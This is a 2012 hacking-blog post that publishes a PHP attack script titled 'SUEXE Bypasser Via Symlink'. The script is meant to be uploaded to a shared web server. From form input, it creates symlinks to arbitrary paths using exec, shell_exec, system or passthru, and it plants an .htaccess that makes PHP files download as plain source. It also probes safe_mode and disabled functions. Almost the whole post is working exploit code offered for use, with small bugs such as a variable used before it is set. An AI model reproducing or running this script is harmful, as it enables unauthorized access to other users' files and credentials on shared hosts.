SUEXE Bypasser Via Symlink (V 1.01) [Priv8]

Thursday, May 10, 2012 


<html> 
<body bgcolor="0000000"> 
<title>symlink</title> 
<center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2> 
<center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4> 
<center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4> 
<center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4> 
<center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4> 
<center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4> 
</html> 

<?php 
//CODED BY IRAN 
//form defining 
print "<form method=post>"; 
print "<center><font color=green>"; 
print "<b>dest :</b><input size=50 name='destenation' value=''>"; 
print "<br>"; 
print "<b>name :</b><input size=50 name='name' value=''>"; 
print "<br>"; 
print "<input type=submit name=_act value='Create!'>"; 
print "</center></font>"; 
$dest = $_POST['destenation']; 
$destname = $_POST['name']; 
?> 

<?php 
//defining variables 
$dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk"; 
$acc = $dir."/.htaceess"; 
$cmd = "ln -s".chr(32).$dest.chr(32).$sym; 
$sym = $dir."/".$destname; 
$htaccess =  
"Options +FollowSymLinks".chr(009). 
"DirectoryIndex seees.html".chr(009). 
"RemoveHandler .php".chr(009). 
"AddType application/octet-stream .php"; 

if (!file_exists($dir)) { 
mkdir ($dir); 
}  
sleep(1); 
if (!file_exists($acc)) { 
$handle = fopen( "$acc" , 'a+' ); 
fputs( $handle ,  "$htaccess" ); 
}  
?> 

<?php 
//check method 
if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) { 
$check = 1; 
}else{ 
$check = 0; 
} 
if(function_exists (symlink)) { 
$checks = 1; 
}else{ 
$checks = 0; 
} 
?> 

<?php 
//define command function 
$resault = '';  
function command($cmde) { 
    if (!empty($cmde))  
 {  
if (function_exists('exec')) { $resault = @exec($cmde); }  
elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
elseif (function_exists('system')) { $resault = @system($cmde); }  
elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
 } 
return $resault; 
} 
?> 

<?php 
//execution 
if ($check ==1 && $checks ==1){ command ($cmd); } 
elseif ($check ==1 && $checks ==0){ command ($cmd); } 
elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); } 
elseif ($check ==0 && $checks ==0)  
{  
print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
} 
?> 
<?php 
//is safe mod on ? start 
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
{  
$safe="<font color=red>ON</font>"; 
}  
else {$safe="<font color=green>OFF</font>";} 
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>"; 
//open safe mod end-- 
?>  
<?php 
//disable function start 
echo "<font color=whitepurple>Disable functions :</font> <b>"; 
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} 
//disable function end-- 
?>

Leave a Reply

Subscribe to Posts | Subscribe to Comments

- Copyright © .Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -